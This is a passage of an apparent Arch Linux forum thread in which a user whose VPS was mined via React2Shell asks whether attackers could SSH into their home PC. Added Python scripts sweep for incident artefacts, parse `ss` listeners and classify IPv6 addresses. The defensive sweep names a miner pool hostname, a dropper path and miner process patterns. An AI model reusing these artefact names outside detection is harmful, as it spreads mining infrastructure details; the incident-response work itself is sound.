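    if not os.path.isdir(proc):
        return found
    for pid in os.listdir(proc):
        if not pid.isdigit():
            continue
        try:
            cmd = Path(proc, pid, "cmdline").read_bytes().replace(b"\0", b" ")
        except OSError:
            continue
        cmd = cmd.decode(errors="replace").strip()
        if any(n in cmd.lower() for n in names):
            found.append((int(pid), cmd))
    return found


def demo():
    """Constructed tree: a file at a known path, a file carrying a pool hostname,
    and a clean file. Returns hits with paths relative to the temp root."""
    with tempfile.TemporaryDirectory() as tmp:
        mon = Path(tmp) / ".config/.system-monitor/.sys-mon"
        mon.parent.mkdir(parents=True)
        mon.write_bytes(b"\x7fELF fake")                     # constructed, not the real binary
        cfg = Path(tmp) / "Documents/notes.json"
        cfg.parent.mkdir(parents=True)
        cfg.write_bytes(b'{"url": "pool.hashvault.pro:443"}')
        (Path(tmp) / "clean.txt").write_text("nothing here")
        return [(reason, Path(p).relative_to(tmp).as_posix()) for reason, p in sweep(tmp)]


if __name__ == "__main__":
    for reason, path in demo():
        print(f"{reason:32} {path}")
    print("miner processes:", miner_processes() or "none")
```

A clean sweep is evidence against the specific artefacts from this incident, not proof the desktop is clean: a different dropper would use different names and hashes, which is why the thread's advice to reinstall the server and treat reused passwords as burned still stands.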

#7 2025-12-10 16:55:07

seth
Member
From: Don't DM me only for attention
Registered: 2012-09-03
Posts: 71,538

Re: [SOLVED]Can attackers penetrate my pc ?

I didn't understand what you meant here, but the reason I specified the language was for confidentiality.

"Programming languages" rarely have "security vulnerabilities" - "security vulnerabilities" are sub-par code. Fault of the developer

Is the IP address obtained from the WAN IP using `whatsmyip` correct?

Yes.
But

the server is a completely rented VPS … They installed a mining script.

sounds like you're indeed running a WAN facing ssh server.
Stop that until you've learned how to protect it.
Your IP showing up anywhere is really of no concern and not required by the script-kiddies turning the system into a bitcoin miner (you hopefully completely nuked and re-installed the server after that)
The SSH protection has to be secure even if I know your name, your IP and the first movie crush of your mother and how often you masturbate a day.
Obscurity is not security in any way shape or form.


#8 2025-12-10 17:53:02

system72
Member
Registered: 2025-11-22
Posts: 347

Re: [SOLVED]Can attackers penetrate my pc ?

just disable password login in ssh, that way they cannot bruteforce their way in..


#9 2025-12-10 17:58:51

jojo06
Member
Registered: 2023-11-04
Posts: 340

Re: [SOLVED]Can attackers penetrate my pc ?

There was an error with your request
Unauthorized

Cant scan.

I stopped the server. And in the morning I started the `rescue system` and did nothing after that. I'm going to delete it and install from scratch. For now I was keeping it to get the script (to report it and learn from it). Now I've got 1-2 codes/files. I did nothing else.

EDIT: How can I change my KDE Wallet Manager password?

@system72
yeah, but it's the aftermath: working out whether they hacked my PC or not, what happened, and learning from it. What to secure, and do I have to change 50 of my passwords, or God, don't?

EDIT 2:

@seth
Phew! 0 open ports. 0 ports open!! Phew... is that what I'm thinking? They didn't/couldn't/can't reach my PC via SSH?

Last edited by jojo06 (2025-12-10 18:05:08)


#10 2025-12-12 22:56:43

jojo06
Member
Registered: 2023-11-04
Posts: 340

Re: [SOLVED]Can attackers penetrate my pc ?

I apologize for the update, but this is really important. And two days have passed. So, am I safe?


#11 2025-12-13 02:49:24

Koatao
Member
Registered: 2018-08-30
Posts: 103

Re: [SOLVED]Can attackers penetrate my pc ?

jojo06 wrote:

I apologize for the update, but this is really important. And two days have passed. So, am I safe?

How should we know?

You were vulnerable to React2Shell (CVE-2025-55182 / CVE-2025-66478), right?
Are you a high value target? Do you hold valuable secrets or have a lot of money or crypto assets? If not, the attackers probably automatically exploited your server and installed a bunch of malware on it as a quick win. Probably extracted data too. But they don't care about who you are and what you might have. You are not worth their time to hack into considering there are millions of apps affected by React2Shell; they will focus their effort elsewhere.
Just nuke the server and monitor your computer for indicators of compromise (like those described here: https://www.labs.greynoise.io/grimoire/ … hcentral/)

If this is really important, get in touch with professional security incident responders.

Last edited by Koatao (2025-12-13 02:59:33)


#12 2025-12-13 03:59:53

jojo06
Member
Registered: 2023-11-04
Posts: 340

Re: [SOLVED]Can attackers penetrate my pc ?

You don't need to be mad.

@seth
Phew! 0 open ports. 0 ports open!! Phew... is that what I'm thinking? They didn't/couldn't/can't reach my PC via SSH?

When there are no open ports on the WAN IP, and if that means you cannot connect via SSH, that indicates there is no problem.
When I didn't get a reply, I thought they were still investigating, unsure. I wanted to agree.

No, I don't have millions of dollars on my computer. But I might have to change dozens of passwords. I might have to format the computer and reinstall everything. I could end up with a lot of work on my hands. Also, this is a learning platform. For example: if there's no problem as long as the port isn't open (thanks to Seth for pointing that out), this could end everything. Otherwise, I should pay more attention to this from now on and increase security measures on the servers. Or I could focus on different languages, projects, or areas. At the very least, I'll pay more attention to these things on projects/servers requested by customers. So yes, it changes a lot of things.

If this is really important, get in touch with professional security incident responders.

I did. And I'm doing it while asking here.

Last edited by jojo06 (2025-12-13 04:01:34)


#13 2025-12-13 08:53:27

seth
Member
From: Don't DM me only for attention
Registered: 2012-09-03
Posts: 71,538

Re: [SOLVED]Can attackers penetrate my pc ?

@jojo06 nobody receives messages for edits, so the strategy where you blog live updates into the post is gonna leave people uninformed.
Think first, then post.
If you're adding genuinely new information because you forgot to first think, that's bad style but doesn't count as bumping and will make sure that people get aware of it.

peww ! 0 open ports. 0 ports open. !! pew.. is that what im thinking ? they didnt/couldnt/cant smile reach my pc via ssh ?

Did you run that w/ the ssh server already stopped (or just the rescue.target running)? Cause then that's not a surprise.

But also notice that if this is indeed the R2S CVE this has nothing to do w/ ssh, the attack comes via HTTP ie. the port where whatever was using react was/is listening (eg. 80)

The most important question is whether this is supposed to be a WAN facing server (you can log in from your moms basement… and also when you're out of house)?
Or is this a LAN server (NAS etc)?

<mantra>NAT is not a firewall, notably b/c of IPv6 and UPnP</mantra> but in general a host behind an ISP issued routermodemswitch isn't open for cold inbound traffic and you can run an unprotected http, ftp… or nfs server there and server software bugs could only be exploited by yourself (or your Mom or who else is on the LAN segment)


#14 2025-12-14 00:26:40

jojo06
Member
Registered: 2023-11-04
Posts: 340

Re: [SOLVED]Can attackers penetrate my pc ?

At first, it gave an `Unauthorized` error, so I requested another link because it didn't work. Later, when it worked, I had to edit it.

The rest of what you wrote seems a bit complicated to me, I'll look into it. But the issue and question are actually much simpler. The problem isn't with the server, and I don't care about the server. Can my computer be connected? That's what I'm after.
The WAN IP address that appears on the site I tested (whatsmyip) is my computer's IP address. That is, the personal PC I am currently using, Arch. There are no special settings, conf files, etc.

But also notice that if this is indeed the R2S CVE this has nothing to do w/ ssh, the attack comes via HTTP ie. the port where whatever was using react was/is listening (eg. 80)

So they didn't need to use brute force with SSH to init scripts?

So, to summarize, the question is: there is a personal computer at home. It is a standard PC with Arch. 0 ports open (based on the result obtained from the site you provided, using the WAN IP obtained from whatsmyip). Is it possible to connect to such a PC via SSH?
As far as I know and expect, the cursor will wait on the new line but won't even ask for a password, because it's not accepting the connection. Because the port isn't open?
So is this correct and can i take a deep breath, relax ?


#15 2025-12-14 09:55:26

seth
Member
From: Don't DM me only for attention
Registered: 2012-09-03
Posts: 71,538

Re: [SOLVED]Can attackers penetrate my pc ?

Is it possible to connect to such a PC via SSH?

No.
Can you please clarify  what

I recently heard about a security vulnerability in a programming language. This was the programming language I use on my server.

exactly is and why you're worried about a ssh connection to your desktop pc/laptop (which probably doesn't even have an active sshd running?) if your server might have been compromised and no, for R2S to work you don't need ssh and according to REACT maintainers clients are never at any jeopardy, the attacks run on the server.
If you're running other connections to that server any successful attack on the server might have facilitated a secondary attack (the evil guys now control your server) against random clients.


#16 2025-12-14 20:20:16

jojo06
Member
Registered: 2023-11-04
Posts: 340

Re: [SOLVED]Can attackers penetrate my pc ?

No.

Phew! Then `my pc` is safe? Do you confirm, my good man @seth?


That's why I got worried; the screen suddenly went black. I had put a similar password to the one in the .env file on my computer. I don't know about Windows. Linux is like a server or something similar. Alma Linux, CentOS, and other options are also Linux. They saw my IP address from the last entries and I thought they connected using `root@myip` and the password in .env, just like connecting to the same server.

SO: Based on the screen going black and what I discussed with others, I think this is what happened: the scenario I mentioned was attempted. However, since I didn't open a port from the modem interface (which we agreed is why the SSH connection to my PC is unavailable/failed, and why I'm safe), the SSH connection couldn't be established. And it was impossible to establish. But the connection (the ssh command on a new line) was waiting, and that's why the screen went black?


#17 2025-12-14 20:33:02

seth
Member
From: Don't DM me only for attention
Registered: 2012-09-03
Posts: 71,538

Re: [SOLVED]Can attackers penetrate my pc ?

No, your PC is *NOT!* "safe".
Security isn't a state.
You're using it, so it's a constant threat of you screwing up. It's not "safe". Not from you, nor from anyone else.

Nothing you've posted here suggests that you've been attacked or are even at risk of an attack, but telling you that your PC "is safe" based on extremely limited and vague information is double-stupid.
I'm not even gonna assure you that you've not been successfully attacked because you've provided no data at all, I've not inspected the system and even then you're dealing in probabilities. (The unknown unknowns…)

That's why I got worried; the screen suddenly went black. I had put a similar password to the one in the .env file on my computer. I don't know about Windows. Linux is like a server or something similar. Alma Linux, CentOS, and other options are also Linux. They saw my IP address from the last entries and I thought they connected using `root@myip` and the password in .env, just like connecting to the same server.

I have no idea what you're trying to say, but the screen going black could be anything from DPMS to a kernel panic or your monitor fusing.

But the connection (the ssh command on a new line) was waiting, and that's why the screen went black?

If every time someone tries to ssh into a system that doesn't listen said system crashed, we'd have to shut down the intern…no, wait: it would never run.

Offline

#18 2025-12-15 00:22:29

herOldMan
Member
Registered: 2013-10-11
Posts: 161

Re: [SOLVED]Can attackers penetrate my pc ?

Any Turing-complete, universal Von Neumann machine (PCs included) that can be made can run any program that can be written, including malware.
(See Enshittification by Cory Doctorow, ISBN 9780374619329)

With PCs, as with drinking water, go with acceptable risk rather than safe.

Offline

#19 2025-12-15 01:32:42

jojo06
Member
Registered: 2023-11-04
Posts: 340

Re: [SOLVED]Can attackers penetrate my pc ?

We can't establish healthy communication. I'd like to thoroughly scan the system with your help, but I don't think you'd want to deal with that here.

The point where the incident occurred and came to a standstill, and where I asked my question, is here:
No ports are open on the WAN IP/my modem/internet. As such, it cannot receive any external connections, including SSH. Is that correct?

Offline

#20 2025-12-15 08:34:10

seth
Member
From: Don't DM me only for attention
Registered: 2012-09-03
Posts: 71,538

Re: [SOLVED]Can attackers penetrate my pc ?

Assuming you ran the text correctly, the system cannot receive *cold* inbound traffic but you will have inbound traffic that's correlated to outbound traffic (when you ask for a webpage you get to see it, right?)
Also are you even running an ssh server on that (desktop?) system? Why?

It might have helped if you would just describe the situation and your concerns in specific details.
The answer to the general questions "Can attackers penetrate my pc or am I safe" are *always* "yes and no".

Offline

#21 2025-12-15 16:26:11

jojo06
Member
Registered: 2023-11-04
Posts: 340

Re: [SOLVED]Can attackers penetrate my pc ?

Assuming you ran the text correctly

What do you mean by text?

I know that in other distros there are two separate packages, `ssh` and `ssh-server`, but is that not the case in Arch?
Even though, `sudo pacman -Ss ssh | grep installed`:

core/libssh2 1.11.1-1 [installed]
core/openssh 10.2p1-2 [installed]
extra/ksshaskpass 6.5.4-1 (plasma) [installed]
extra/libssh 0.11.3-1 [installed]
extra/qemu-block-ssh 10.1.2-3 [installed]
extra/seahorse 1:47.0.1-6 [installed]
extra/sshpass 1.10-2 [installed]

It might have helped if you would just describe the situation and your concerns in specific details.

That's all I know. React2Shell was the vuln, as you guessed.
Did you see something about an SSH server configuration? There is no SSH server, the package is installed to connect to the outside and to the server.

So I've boiled down the incident, the problem, and the solution into a single sentence. But I think there's a communication breakdown, or the issue is deeper. But as I've said many times before, my concern isn't server-related. I don't care about the server. There's no sensitive data, loss, damage, etc. But my concern is my own computer.

And the question and solution regarding this are as follows: Can you connect via SSH to a WAN IP address that doesn't have the port open?
The answer to this will be yes / no / maybe (I hope not).

I'm not talking about another security vulnerability, hacking possibility, abuse, exploitation, etc.
I'm *not* talking about “any system connected to the internet...”
I'm *not* talking about “depending on the programmer/hacker and the person using the computer...”

I don't know what else I can tell you or say. But if you could tell me how I can get any information that might help (websites you sent, commands, etc.), I'll share the results.

..But as I said, the issue boils down to this (because the current scenario and what worries me—what other method could they have used—is this:) Could they connect to **my computer** via SSH?
>> The one for my personal use, Arch, no ports open on the WAN IP...

Otherwise, scripts, open source packages, websites I visit, etc., etc. There are endless possibilities regarding whether my computer has been accessed/hacked or whether it can/could be accessed/hacked.

Offline

#22 2025-12-15 16:37:19

seth
Member
From: Don't DM me only for attention
Registered: 2012-09-03
Posts: 71,538

Re: [SOLVED]Can attackers penetrate my pc ?

What do you mean by text?

"test", typo - sorry.

but is that not the case in Arch?

No and it's also not a metric for whether you're running an ssh server.

ps aux | grep sshd
ss -tulpen
nmap localhost

Can you connect via SSH to a WAN IP address that doesn't have the port open?

No.

What do you think ssh has to do w/ REACT or React2Shell specifically?
Do you run the React server components anywhere?

For all we know your system crashed, god knows why and you came up w/ a story that this was due to a failed attack on your non-existing ssh server because R2S and reasons.
Nothing here makes any sense.

Offline
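The three commands above answer "is anything listening at all". The script below is an added example, not code from the thread: it parses the text of `ss -tulpen` and sorts each listener into who can reach it (this machine only, the LAN, or anybody once a port is forwarded), which is the distinction the question keeps circling. The sample output embedded in it is constructed, modelled on the lines posted later in this thread, so it runs offline; the service name is pulled from the `cgroup:` column that `ss -e` prints on systemd systems (an assumption about the output format, not something the thread states).

```python
"""Classify the listeners reported by `ss -tulpen` by who can reach them.

Added example for the check above; it is not code from the thread. The sample
below is constructed (modelled on the lines posted in the thread) so that it
runs offline. To audit a real machine, pipe the real output through it:
    ss -tulpen | python3 ss_exposure.py
"""
import ipaddress
import re
import sys
from dataclasses import dataclass

# Constructed sample: a subset of the listeners shown in the thread.
SAMPLE_SS_OUTPUT = """\
Netid State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp   UNCONN 0      0      127.0.0.53%lo:53  0.0.0.0:*  uid:976 cgroup:/system.slice/systemd-resolved.service <->
udp   UNCONN 0      0      *:1716  *:*  users:(("kdeconnectd",pid=2240,fd=39)) uid:1000 cgroup:/user.slice/user-1000.slice/user@1000.service/app.slice/app-org.kde.kdeconnect.daemon@autostart.service v6only:0 <->
tcp   LISTEN 0      80     0.0.0.0:3306  0.0.0.0:*  uid:957 cgroup:/system.slice/mariadb.service <->
tcp   LISTEN 0      128    0.0.0.0:22  0.0.0.0:*  ino:8750 cgroup:/system.slice/sshd.service <->
tcp   LISTEN 0      4096   127.0.0.1:27017  0.0.0.0:*  uid:952 cgroup:/system.slice/mongodb.service <->
tcp   LISTEN 0      10     *:3389  *:*  uid:967 cgroup:/system.slice/gnome-remote-desktop.service v6only:0 <->
tcp   LISTEN 0      511    *:443  *:*  cgroup:/system.slice/httpd.service v6only:0 <->
udp   UNCONN 0      0      [fe80::c5bf:b51:fee:3cc3]%wlp0s20f0u10:546  [::]:*  cgroup:/system.slice/NetworkManager.service v6only:1 <->
"""


@dataclass(frozen=True)
class Listener:
    proto: str     # tcp / udp
    host: str      # bind address with brackets and %scope id removed
    port: int
    service: str   # systemd unit taken from the cgroup column, or "?"
    scope: str     # any / specific / link-local / multicast / loopback / unknown


# Last path element of the cgroup column that ends in ".service".
_SERVICE_RE = re.compile(r"cgroup:/(?:[^ ]*/)?([^/ ]+\.service)")


def split_local(field):
    """Split ss's 'Local Address:Port' column into (host, port)."""
    host, _, port = field.rpartition(":")
    host = host.split("%", 1)[0].strip("[]")   # drop %iface scope id and IPv6 brackets
    return host, int(port) if port.isdigit() else -1


def scope_of(host):
    """Who can reach a socket bound to this address."""
    if host == "*":
        return "any"                 # dual-stack wildcard: every IPv4 and IPv6 address
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "unknown"
    if ip.is_unspecified:            # 0.0.0.0 or :: - every address of that family
        return "any"
    if ip.is_loopback:               # 127.0.0.0/8 or ::1 - this machine only
        return "loopback"
    if ip.is_link_local:             # fe80::/10 or 169.254.0.0/16 - same link only
        return "link-local"
    if ip.is_multicast:
        return "multicast"
    return "specific"                # one of the host's own unicast addresses


def parse_ss(text):
    """Turn `ss -tulpen` output into Listener records (LISTEN / UNCONN rows only)."""
    listeners = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 6 or fields[1] not in ("LISTEN", "UNCONN"):
            continue                 # header line, established connections, etc.
        host, port = split_local(fields[4])
        m = _SERVICE_RE.search(line)
        listeners.append(Listener(fields[0], host, port,
                                  m.group(1) if m else "?", scope_of(host)))
    return listeners


def lan_reachable(listeners):
    """Sockets other hosts on the LAN can talk to. They become Internet-reachable
    as soon as the router forwards the port, or the host has a global IPv6
    address and no stateful firewall in front of it."""
    return [l for l in listeners if l.scope not in ("loopback", "unknown")]


def sshd_reachable(listeners):
    """The thread's actual question: is an ssh server reachable from other hosts?"""
    return any(l.proto == "tcp" and (l.service == "sshd.service" or l.port == 22)
               for l in lan_reachable(listeners))


if __name__ == "__main__":
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_SS_OUTPUT
    listeners = parse_ss(text)
    for l in sorted(listeners, key=lambda l: (l.scope, l.port)):
        print(f"{l.proto:3} {l.port:5d} {l.scope:<10} {l.service}")
    print("ssh server reachable from the LAN:", sshd_reachable(listeners))
```

On the sample, only the resolver stub on 127.0.0.53 and MongoDB on 127.0.0.1 are local-only; sshd, MariaDB, httpd, gnome-remote-desktop and kdeconnect all bind a wildcard and answer anyone on the LAN. "No port forwarded on the router" keeps cold IPv4 connections out, but it says nothing about the LAN itself or about IPv6, which is why the next check is for a global IPv6 address.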

#23 2025-12-15 17:13:25

jojo06
Member
Registered: 2023-11-04
Posts: 340

Re: [SOLVED]Can attackers penetrate my pc ?

EDIT: BTW, you can't go wrong with that test. How can I? I looked up `whatsmyip` and pasted that IP into `https://pentest-tools.com/network-vulnerability-scanning/port-scanner-online-nmap` and clicked `Start Scan` with the defaults selected. Now I also turned on `detect operating system` in the scan options and tested again, same. But I'm also running another scan now with `detect operating system` selected, on the UDP side this time. It's scanning now.

ps aux | grep sshd

root         547  0.0  0.0   9100  5592 ?        Ss   Dec14   0:00 sshd: /usr/bin/sshd -D [listener] 0 of 10-100 startups
guns      129486  0.0  0.0   6620  4220 pts/8    S+   19:56   0:00 grep --color=auto sshd

ss -tulpen

Netid   State    Recv-Q   Send-Q                              Local Address:Port      Peer Address:Port  Process                                                                                                                                                                                          
udp     UNCONN   0        0                                         0.0.0.0:5353           0.0.0.0:*                                                  uid:976 ino:3070429 sk:d cgroup:/system.slice/systemd-resolved.service <->                                                                          
udp     UNCONN   0        0                                         0.0.0.0:5355           0.0.0.0:*                                                  uid:976 ino:3070419 sk:e cgroup:/system.slice/systemd-resolved.service <->                                                                          
udp     UNCONN   0        0                                   192.168.1.101:38909          0.0.0.0:*      users:(("Socket Process",pid=2712,fd=32))   uid:1000 ino:5342463 sk:f cgroup:/user.slice/user-1000.slice/user@1000.service/app.slice/app-firefox@07ace7323dc441e587ced4bfd8ab285d.service <->   
udp     UNCONN   0        0                                      127.0.0.54:53             0.0.0.0:*                                                  uid:976 ino:3077121 sk:10 cgroup:/system.slice/systemd-resolved.service <->                                                                         
udp     UNCONN   0        0                                   127.0.0.53%lo:53             0.0.0.0:*                                                  uid:976 ino:3070975 sk:11 cgroup:/system.slice/systemd-resolved.service <->                                                                         
udp     UNCONN   0        0                                   192.168.1.101:34143          0.0.0.0:*      users:(("python3",pid=53087,fd=11))         uid:1000 ino:5685989 sk:12 cgroup:/user.slice/user-1000.slice/user@1000.service/session.slice/gvfs-daemon.service <->                               
udp     UNCONN   0        0                                   192.168.1.101:3702           0.0.0.0:*      users:(("python3",pid=53087,fd=12))         uid:1000 ino:5685990 sk:13 cgroup:/user.slice/user-1000.slice/user@1000.service/session.slice/gvfs-daemon.service <->                               
udp     UNCONN   0        0                                 239.255.255.250:3702           0.0.0.0:*      users:(("python3",pid=53087,fd=10))         uid:1000 ino:5685988 sk:14 cgroup:/user.slice/user-1000.slice/user@1000.service/session.slice/gvfs-daemon.service <->                               
udp     UNCONN   0        0          [fe80::c5bf:b51:fee:3cc3]%wlp0s20f0u10:37654             [::]:*      users:(("python3",pid=53087,fd=8))          uid:1000 ino:5690495 sk:15 cgroup:/user.slice/user-1000.slice/user@1000.service/session.slice/gvfs-daemon.service v6only:1 <->                      
udp     UNCONN   0        0                                            [::]:5353              [::]:*                                                  uid:976 ino:3070430 sk:16 cgroup:/system.slice/systemd-resolved.service v6only:1 <->                                                                
udp     UNCONN   0        0                                            [::]:5355              [::]:*                                                  uid:976 ino:3070427 sk:17 cgroup:/system.slice/systemd-resolved.service v6only:1 <->                                                                
udp     UNCONN   0        0          [fe80::c5bf:b51:fee:3cc3]%wlp0s20f0u10:546               [::]:*                                                  ino:5688592 sk:18 cgroup:/system.slice/NetworkManager.service v6only:1 <->                                                                          
udp     UNCONN   0        0                                               *:1716                 *:*      users:(("kdeconnectd",pid=2240,fd=39))      uid:1000 ino:27762 sk:19 cgroup:/user.slice/user-1000.slice/user@1000.service/app.slice/app-org.kde.kdeconnect.daemon@autostart.service v6only:0 <->
udp     UNCONN   0        0          [fe80::c5bf:b51:fee:3cc3]%wlp0s20f0u10:3702              [::]:*      users:(("python3",pid=53087,fd=9))          uid:1000 ino:5690496 sk:1a cgroup:/user.slice/user-1000.slice/user@1000.service/session.slice/gvfs-daemon.service v6only:1 <->                      
udp     UNCONN   0        0                          [ff02::c]%wlp0s20f0u10:3702              [::]:*      users:(("python3",pid=53087,fd=7))          uid:1000 ino:5690494 sk:1b cgroup:/user.slice/user-1000.slice/user@1000.service/session.slice/gvfs-daemon.service v6only:1 <->                      
tcp     LISTEN   0        80                                        0.0.0.0:3306           0.0.0.0:*                                                  uid:957 ino:8856 sk:1 cgroup:/system.slice/mariadb.service <->                                                                                      
tcp     LISTEN   0        4096                                127.0.0.53%lo:53             0.0.0.0:*                                                  uid:976 ino:3070976 sk:2 cgroup:/system.slice/systemd-resolved.service <->                                                                          
tcp     LISTEN   0        128                                       0.0.0.0:22             0.0.0.0:*                                                  ino:8750 sk:3 cgroup:/system.slice/sshd.service <->                                                                                                 
tcp     LISTEN   0        4096                                    127.0.0.1:27017          0.0.0.0:*                                                  uid:952 ino:20745 sk:4 cgroup:/system.slice/mongodb.service <->                                                                                     
tcp     LISTEN   0        4096                                   127.0.0.54:53             0.0.0.0:*                                                  uid:976 ino:3077122 sk:5 cgroup:/system.slice/systemd-resolved.service <->                                                                          
tcp     LISTEN   0        4096                                      0.0.0.0:5355           0.0.0.0:*                                                  uid:976 ino:3070420 sk:6 cgroup:/system.slice/systemd-resolved.service <->                                                                          
tcp     LISTEN   0        80                                           [::]:3306              [::]:*                                                  uid:957 ino:8857 sk:7 cgroup:/system.slice/mariadb.service v6only:1 <->                                                                             
tcp     LISTEN   0        10                                              *:3389                 *:*                                                  uid:967 ino:8775 sk:8 cgroup:/system.slice/gnome-remote-desktop.service v6only:0 <->                                                                
tcp     LISTEN   0        511                                             *:443                  *:*                                                  ino:10626 sk:9 cgroup:/system.slice/httpd.service v6only:0 <->                                                                                      
tcp     LISTEN   0        50                                              *:1716                 *:*      users:(("kdeconnectd",pid=2240,fd=40))      uid:1000 ino:27763 sk:a cgroup:/user.slice/user-1000.slice/user@1000.service/app.slice/app-org.kde.kdeconnect.daemon@autostart.service v6only:0 <-> 
tcp     LISTEN   0        511                                             *:8080                 *:*                                                  ino:10608 sk:b cgroup:/system.slice/httpd.service v6only:0 <->                                                                                      
tcp     LISTEN   0        4096                                         [::]:5355              [::]:*                                                  uid:976 ino:3070428 sk:c cgroup:/system.slice/systemd-resolved.service v6only:1 <->     

nmap localhost

Starting Nmap 7.98 ( https://nmap.org ) at 2025-12-15 19:57 +0300
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000070s latency).
Other addresses for localhost (not scanned): ::1
Not shown: 995 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
443/tcp  open  https
3306/tcp open  mysql
3389/tcp open  ms-wbt-server
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 0.07 seconds

I hope they didn't close it after connecting? If they did, I guess the connection will be lost?

What do you think ssh has to do w/ REACT or React2Shell specifically?

They saw my IP in the last connections on the server. `guns` username is the same. Passwords similar.

Do you run the React server components anywhere?

Yes, in the VPS and local development.

For local dev; as far as I remember, I didn't configure the domain as `conf`, but as far as I can see, there is no such situation on the PC:
cat /etc/resolv.conf

# Generated by NetworkManager
search local
nameserver 192.168.1.1
nameserver fe80::1%wlp0s20f0u10

For all we know your system crashed, god knows why and you came up w/ a story that this was due to a failed attack on your non-existing ssh server because R2S and reasons.

I think you're a little distracted. Same for me. I mentioned it many times, but after these attempts I'm going to guess you didn't like the answer or the logic doesn't fit in your mind. Let's say it has nothing to do with it, because it doesn't have any attack-related relation.

Actually we're just digging. Otherwise my question is clear. I was worrying about my PC, because my VPS was hacked. Same user, same IP address used on both the PC and the VPS. And let's say that's it?

THIS WILL SOLVE:

`non-existing ssh server`, so that means my PC CAN'T be connected to via SSH? People CAN'T connect to my PC with ssh? The one and only: an ssh connection with its command `ssh guns@myip` or `ssh root@myip`?

Can we surely say `no, it can't/won't connect`, because 0 ports are open and you said `non-existing ssh server`? Because my PC does not run an ssh server and uses the standard ssh package for `OUTGOING` ssh connections/usage, and not for receiving them?

Last edited by jojo06 (2025-12-15 18:07:15)

Offline

#24 2025-12-15 18:53:40

seth
Member
From: Don't DM me only for attention
Registered: 2012-09-03
Posts: 71,538

Re: [SOLVED]Can attackers penetrate my pc ?

I hope they didn't close it after connecting? If they did, I guess the connection will be lost?

Nobody closed anything, but you *ARE* running an ssh and http server as well as mysql on that system.
If/since they're not WAN facing but behind a NAT (have you checked the IPv6?) it's however unlikely that they've been accessed from outside the LAN.

They saw my IP in the last connections on the server. `guns` username is the same. Passwords similar.

So your actual concern is that your credentials have been exposed.
==> Change them *everywhere*!

Yes, in the VPS and local development.

You've hopefully nuked all systems where this was WAN-facing.
nb. that the first series of patches did NOT fully fix the CVE

Can we surely say `no, it can't/won't connect`, because 0 ports are open and you said `non-existing ssh server`

I didn't say there's no ssh server and your last post indeed shows one.
Other than that, check the global IPv6 if you have one (fe80::* is not a global IPv6).
Do not post it here or anywhere else.

Offline

#25 2025-12-15 19:25:44

jojo06
Member
Registered: 2023-11-04
Posts: 340

Re: [SOLVED]Can attackers penetrate my pc ?

Am I running an ssh server? How to close http though? Yeah, I should close mysql.

I don't know how to check IPv6.

==> Change them *everywhere*!

I changed the password. What happened, happened. That's not the point. I'm going to reset and change a lot of things if ssh could have been achieved.


So your actual concern is that your credentials have been exposed.

@seth no! My one and only concern is: can they ssh connect to me? That's all my concern. Not the server, no hacking, no creds, not life, nothing. Just: can an ssh connection be established to my PC? That's all my concern. That's it. That's the only concern. This is my only concern. Nothing else. Just 1: the ssh thing. Just it.

You've hopefully nuked all systems where this was WAN-facing.

Such as? Oh, you mean the server using that version. Yeah, the services are stopped. Not serving that anymore. It's not running.

Other than that, check the global IPv6 if you have one (fe80::* is not a global IPv6).

Can you tell me how? And does the UDP scan take some time? It's still scanning, it says.

Offline
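The "check the global IPv6" advice in #24 and the "how?" in #25 both come down to reading `ip -6 addr` and telling the address classes apart, so here is one added example that serves both (it is not code from the thread). It classifies each `inet6` line by prefix rather than trusting the `scope` word `ip` prints, because the kernel labels unique-local fc00::/7 addresses `scope global` too, even though those are not routed on the Internet. The sample output is constructed; the 2001:db8::/32 address in it is the documentation prefix standing in for a real provider-assigned one and is deliberately not any real address.

```python
"""Does this machine have a global (Internet-routable) IPv6 address?

Added example for the IPv6 check discussed above; not code from the thread.
Feed it the text of `ip -6 addr`:
    ip -6 addr | python3 ip6_check.py
The SAMPLE below is constructed; 2001:db8::/32 is the documentation prefix
standing in for a real provider-assigned address.
"""
import ipaddress
import re
import sys

SAMPLE_IP6_OUTPUT = """\
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 state UNKNOWN qlen 1000
    inet6 ::1/128 scope host noprefixroute
       valid_lft forever preferred_lft forever
2: wlp0s20f0u10: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 state UP qlen 1000
    inet6 2001:db8:4d2:1:3b1c:9fd2:77e0:1a2b/64 scope global dynamic noprefixroute
       valid_lft 86397sec preferred_lft 14397sec
    inet6 fd12:3456:789a:1:9c1e:2b7a:4de5:11f0/64 scope global noprefixroute
       valid_lft forever preferred_lft forever
    inet6 fe80::c5bf:b51:fee:3cc3/64 scope link noprefixroute
       valid_lft forever preferred_lft forever
"""

# "inet6 <addr>/<prefixlen> scope <word> ..." as printed by iproute2.
_INET6_RE = re.compile(r"^\s*inet6\s+([0-9a-f:]+)/(\d+)\s+scope\s+(\w+)", re.M | re.I)

# Checked in order; the first matching range wins.
RANGES = [
    ("loopback",       ipaddress.ip_network("::1/128")),
    ("link-local",     ipaddress.ip_network("fe80::/10")),   # auto-configured, same link only
    ("unique-local",   ipaddress.ip_network("fc00::/7")),    # private, like RFC 1918 for IPv6
    ("global-unicast", ipaddress.ip_network("2000::/3")),    # routed on the Internet
]


def classify_ipv6(addr):
    """Classify one IPv6 address by prefix. Raises ValueError for non-IPv6 input."""
    ip = ipaddress.ip_address(addr)
    if not isinstance(ip, ipaddress.IPv6Address):
        raise ValueError(f"not an IPv6 address: {addr}")
    for name, net in RANGES:
        if ip in net:
            return name
    return "other"       # multicast, IPv4-mapped, deprecated ranges, ...


def parse_ip6(text):
    """(address, prefixlen, scope word from ip, prefix classification) per inet6 line."""
    return [(addr, int(plen), scope, classify_ipv6(addr))
            for addr, plen, scope in _INET6_RE.findall(text)]


def global_ipv6_addresses(text):
    return [addr for addr, _, _, cls in parse_ip6(text) if cls == "global-unicast"]


def has_global_ipv6(text):
    """True when at least one address is Internet-routable. If so, the NAT argument
    from the thread does not apply to IPv6: only a firewall (on the router or the
    host) keeps cold inbound connections away from the listeners found with ss."""
    return bool(global_ipv6_addresses(text))


if __name__ == "__main__":
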